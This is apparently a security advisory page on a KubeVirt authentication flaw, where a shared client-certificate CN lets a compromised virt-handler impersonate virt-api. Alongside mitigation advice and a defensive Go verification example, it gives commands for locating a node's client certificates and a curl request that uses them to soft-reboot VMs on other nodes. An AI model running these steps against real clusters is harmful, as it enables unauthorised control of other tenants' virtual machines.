The vulnerability stems from improper TLS certificate management: the `virt-api` component and every `virt-handler` instance use client certificates with the identical Common Name (CN) `kubevirt.io:system:client:virt-handler`. This CN is the sole field checked by the `verifyPeerCert` function in `pkg/util/tls/tls.go` when authenticating clients connecting to a virt-handler's API server. Consequently, a compromised `virt-handler` can use its own client certificate bundle to authenticate successfully to any other `virt-handler` instance on the network, impersonating the `virt-api` service. This lets the attacker issue privileged VM lifecycle commands (such as soft-rebooting a VM via a PUT request to the `/softreboot` subresource endpoint) against VMs managed by other, uncompromised `virt-handler` nodes, bypassing the intended access controls.
Platform: KubeVirt
Version: Pre-1.0.2
Vulnerability: Improper Authentication
Severity: Critical
Date: 2024-11-07
Prediction: 2024-11-28
What Undercode Say:
# Inspect the CN presented by a virt-handler's client certificate
openssl x509 -text -in /etc/virt-handler/clientcertificates/tls.crt | grep "Subject:"
# Locate the running virt-handler container and confirm where its client certificates are mounted
CID=$(docker ps --filter 'name=virt-handler' --format '{{.ID}}' | head -n 1)
docker inspect $CID | grep "clientcertificates:ro"
# The same bundle is accepted by a different virt-handler's API server (port 8186)
curl -ki --cert /path/tls.crt --key /path/tls.key https://<target_ip>:8186/v1/namespaces/default/virtualmachineinstances/<vmi-name>/softreboot -XPUT
// pkg/util/tls/tls.go (excerpt; the full parameter list is elided on the page)
func verifyPeerCert(...) error {
    // The expected identity is built from a role name; every virt-handler and
    // virt-api client shares the same "client" role, so the CN cannot tell them apart.
    fullCommonName := fmt.Sprintf("kubevirt.io:system:%s:virt-handler", commonName)
    if !externallyManaged && c.Subject.CommonName != fullCommonName {
        return fmt.Errorf("common name is invalid, expected %s, but got %s", fullCommonName, c.Subject.CommonName)
    }
    // ... remainder of the function continues on the original page
}
How the Exploit Works:
Compromise virt-handler node.
Steal client TLS certificates.
Impersonate virt-api service.
Issue VM control commands.
Protection from this CVE:
Update KubeVirt.
Use distinct certificate CNs.
Implement stricter mTLS verification.
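The two mitigations above (distinct CNs per role, stricter mTLS verification) and the `verifyPeerCert` excerpt are illustrated by the following Go program. It is an added example written for this page, not KubeVirt's own code: it mints an in-memory CA and client certificates, then runs a peer check that requires a valid chain to that CA, the client-auth EKU, and a per-endpoint allow-list of identities. The only CN taken from the page is the shared `kubevirt.io:system:client:virt-handler`; the two distinct role CNs are assumptions chosen for the example. The last scenario reproduces the flaw: when both roles carry the shared CN, no CN-based check can distinguish a peer virt-handler from virt-api.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// sharedCN is the identity documented on the page; the other two are assumed
// distinct per-role identities used only by this example.
const (
	sharedCN      = "kubevirt.io:system:client:virt-handler"
	cnVirtAPI     = "kubevirt.io:system:client:virt-api"   // assumed
	cnVirtHandler = "kubevirt.io:system:node:virt-handler" // assumed
)

var serial int64 // monotonically increasing serial for the test certificates

func newTemplate(cn string) *x509.Certificate {
	serial++
	return &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: cn},
		NotBefore:    time.Now().Add(-time.Minute),
		NotAfter:     time.Now().Add(time.Hour),
	}
}

// newCA creates a self-signed CA; the verifier trusts only the cluster CA.
func newCA(name string) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	tmpl := newTemplate(name)
	tmpl.IsCA, tmpl.BasicConstraintsValid = true, true
	tmpl.KeyUsage = x509.KeyUsageCertSign
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// issueClient mints a DER client-auth certificate for one role, signed by ca.
func issueClient(ca *x509.Certificate, caKey *ecdsa.PrivateKey, cn string) ([]byte, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := newTemplate(cn)
	tmpl.KeyUsage = x509.KeyUsageDigitalSignature
	tmpl.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}
	return x509.CreateCertificate(rand.Reader, tmpl, ca, &key.PublicKey, caKey)
}

// verifyPeer accepts a client only if its chain ends at a trusted root with the
// client-auth EKU and its CN is on the allow-list for this specific endpoint.
func verifyPeer(rawCert []byte, roots *x509.CertPool, allowedCNs map[string]bool) error {
	c, err := x509.ParseCertificate(rawCert)
	if err != nil {
		return err
	}
	opts := x509.VerifyOptions{Roots: roots, KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}}
	if _, err := c.Verify(opts); err != nil {
		return fmt.Errorf("chain verification failed: %w", err)
	}
	if !allowedCNs[c.Subject.CommonName] {
		return fmt.Errorf("identity %q not permitted on this endpoint", c.Subject.CommonName)
	}
	return nil
}

// Outcome records how a virt-api-only endpoint treats each client.
type Outcome struct {
	APIAccepted       bool // distinct virt-api identity passes
	HandlerRejected   bool // a peer virt-handler identity is refused
	ForgedRejected    bool // correct CN but untrusted CA is refused
	SharedCNAmbiguous bool // pre-1.0.2 layout: both roles pass the same CN check
}

// Scenario runs all four checks against constructed, in-memory certificates.
func Scenario() (Outcome, error) {
	var o Outcome
	ca, caKey, err := newCA("example-cluster-ca")
	if err != nil {
		return o, err
	}
	rogueCA, rogueKey, err := newCA("untrusted-ca")
	if err != nil {
		return o, err
	}
	issue := func(c *x509.Certificate, k *ecdsa.PrivateKey, cn string) []byte {
		der, e := issueClient(c, k, cn)
		if e != nil && err == nil {
			err = e
		}
		return der
	}
	apiCert, handlerCert := issue(ca, caKey, cnVirtAPI), issue(ca, caKey, cnVirtHandler)
	forged := issue(rogueCA, rogueKey, cnVirtAPI)
	legacyAPI, legacyHandler := issue(ca, caKey, sharedCN), issue(ca, caKey, sharedCN)
	if err != nil {
		return o, err
	}
	roots := x509.NewCertPool()
	roots.AddCert(ca)
	apiOnly := map[string]bool{cnVirtAPI: true}
	o.APIAccepted = verifyPeer(apiCert, roots, apiOnly) == nil
	o.HandlerRejected = verifyPeer(handlerCert, roots, apiOnly) != nil
	o.ForgedRejected = verifyPeer(forged, roots, apiOnly) != nil
	legacy := map[string]bool{sharedCN: true}
	o.SharedCNAmbiguous = verifyPeer(legacyAPI, roots, legacy) == nil && verifyPeer(legacyHandler, roots, legacy) == nil
	return o, nil
}

func main() {
	o, err := Scenario()
	fmt.Printf("%+v err=%v\n", o, err)
}
```

The allow-list is keyed per endpoint rather than per server: an endpoint that only virt-api should reach lists only the virt-api identity, so a certificate issued to a node-level component is rejected even though it chains to the same cluster CA. The `SharedCNAmbiguous` result is the point of the advisory: once two roles share one CN, the check in `verifyPeerCert` has nothing left to distinguish them, and separating the identities is a prerequisite for any stricter verification.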
Impact:
VM lifecycle compromise.
Cluster integrity breach.
Privilege escalation.
Sources:
Reported By: github.com